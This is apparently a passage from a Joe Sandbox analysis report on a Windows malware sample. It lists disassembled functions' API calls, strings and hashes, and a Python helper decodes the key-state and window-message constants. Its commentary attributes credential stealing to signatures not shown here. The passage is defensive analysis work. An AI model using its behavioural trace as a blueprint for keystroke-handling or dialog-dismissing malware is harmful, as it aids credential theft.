                                                            Strings
                                                            Similarity
                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 3125838495-3381328864
                                                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                            APIs
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            Similarity
                                                            • API ID: MessageSend$CharNext
                                                            • String ID:
                                                            • API String ID: 1350042424-0
                                                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                            • _wcscpy.LIBCMT ref: 004787E5
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 3052893215-2127371420
                                                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                            • __swprintf.LIBCMT ref: 0045E7F7
                                                            • _wprintf.LIBCMT ref: 0045E8B3
                                                            • _wprintf.LIBCMT ref: 0045E8D7
                                                            Strings
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-2354261254
                                                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 3038501623-2263619337
                                                            • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                            • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                            • __swprintf.LIBCMT ref: 0045E5F6
                                                            • _wprintf.LIBCMT ref: 0045E6A3
                                                            • _wprintf.LIBCMT ref: 0045E6C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-8599901
                                                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00443B67
                                                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                            • SetActiveWindow.USER32(?), ref: 00443BEC
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                            • IsWindow.USER32(?), ref: 00443C3A
                                                            • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1834419854-3405671355
                                                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                            • LoadStringW.USER32(00000000), ref: 00454040
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • _wprintf.LIBCMT ref: 00454074
                                                            • __swprintf.LIBCMT ref: 004540A3
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 455036304-4153970271
                                                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                            • _memmove.LIBCMT ref: 00467EB8
                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                            • _memmove.LIBCMT ref: 00467F6C
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                            • String ID:
                                                            • API String ID: 2170234536-0
                                                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00453CE0
                                                            • SetKeyboardState.USER32(?), ref: 00453D3B
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                            • GetKeyState.USER32(000000A0), ref: 00453D75
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                            • GetKeyState.USER32(00000011), ref: 00453DEF
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                            • GetKeyState.USER32(00000012), ref: 00453E26
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
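The bullet lines under each "APIs" heading above share one format: call name, module, argument list as the sandbox captured it, and the address of the call site; nested "Part of subcall function" lines attribute a call to a callee. The raw hexadecimal arguments hide the interesting part: the function directly above polls GetAsyncKeyState/GetKeyState for 0xA0, 0xA1, 0x11, 0x12 and 0x5B, which are the standard winuser.h values VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN, and the dialog-closing function earlier sends 0xF5 (BM_CLICK) and then 0x10 (WM_CLOSE). The Python below is an added example and not Joe Sandbox code: it parses those bullet lines into records and decodes the constants so the listing can be triaged quickly. The sample input is constructed from lines copied off this page; the constant tables are the documented Windows values.

```python
"""Parse Joe Sandbox 'APIs' bullet lines into records and decode the Windows
constants they pass.  Added example for this report, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample: bullet lines copied from the key-state and dialog functions
# in this report (indentation and the "Part of subcall function" prefix included).
SAMPLE = """\
• GetKeyboardState.USER32(?), ref: 00453CE0
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
"""

# One bullet line: optional subcall prefix, Name.MODULE, optional (args), ref: addr.
# LIBCMT entries such as "_wprintf.LIBCMT ref: 0045E6A3" have no parentheses and no comma.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Standard winuser.h values (not taken from the report).
VK = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MSG = {0x0010: "WM_CLOSE", 0x00F5: "BM_CLICK", 0x00F7: "BM_SETIMAGE"}
KEY_STATE_APIS = {"GetKeyState", "GetAsyncKeyState"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # call-site address inside the dumped image
    subcall_of: Optional[int]     # callee address when the line is a subcall entry


def _parse_args(raw: Optional[str]) -> List[str]:
    if raw is None or not raw.strip():
        return []
    return [a.strip() for a in raw.split(",")]


def _hex_arg(arg: str) -> Optional[int]:
    """Arguments are hex; '?' and symbolic values (BUTTON) stay undecoded."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue          # headings such as "APIs"/"Strings" and anything unparseable
        calls.append(ApiCall(
            name=m["name"], module=m["module"], args=_parse_args(m["args"]),
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return calls


def annotate(call: ApiCall) -> str:
    """Decode the constant a call passes: VK code for key-state APIs, message id for SendMessageW."""
    if call.name in KEY_STATE_APIS and call.args:
        code = _hex_arg(call.args[0])
        return "?" if code is None else VK.get(code, f"VK 0x{code:02X}")
    if call.name == "SendMessageW" and len(call.args) >= 2:
        msg = _hex_arg(call.args[1])
        return "?" if msg is None else MSG.get(msg, f"msg 0x{msg:04X}")
    return ""


def polled_modifier_keys(calls: List[ApiCall]) -> Set[str]:
    """Names of the modifier keys whose state the listed function polls."""
    keys = set()
    for c in calls:
        if c.name in KEY_STATE_APIS and c.args:
            code = _hex_arg(c.args[0])
            if code in VK:
                keys.add(VK[code])
    return keys


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        prefix = f"[sub {c.subcall_of:08X}] " if c.subcall_of is not None else ""
        print(f"{c.ref:08X} {prefix}{c.name}.{c.module}({', '.join(c.args)}) {annotate(c)}")
    print("modifier keys polled:", sorted(polled_modifier_keys(parsed)))
```

Read the decode as a triage aid, not a verdict: a function that snapshots GetKeyboardState, polls five modifier keys and restores the state with SetKeyboardState is what a synthetic-keystroke helper looks like, so on its own it is not evidence of keylogging; the stealing behaviour this report attributes to the sample comes from the browser and mail credential signatures listed at the top, not from this routine.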
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                            • DeleteObject.GDI32(?), ref: 0047151E
                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                            • DeleteObject.GDI32(?), ref: 004715EA
                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                            • String ID:
                                                            • API String ID: 3218148540-0
                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                            • String ID:
                                                            • API String ID: 136442275-0
                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcstok.LIBCMT ref: 004674FF
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcstok.LIBCMT ref: 004675B2
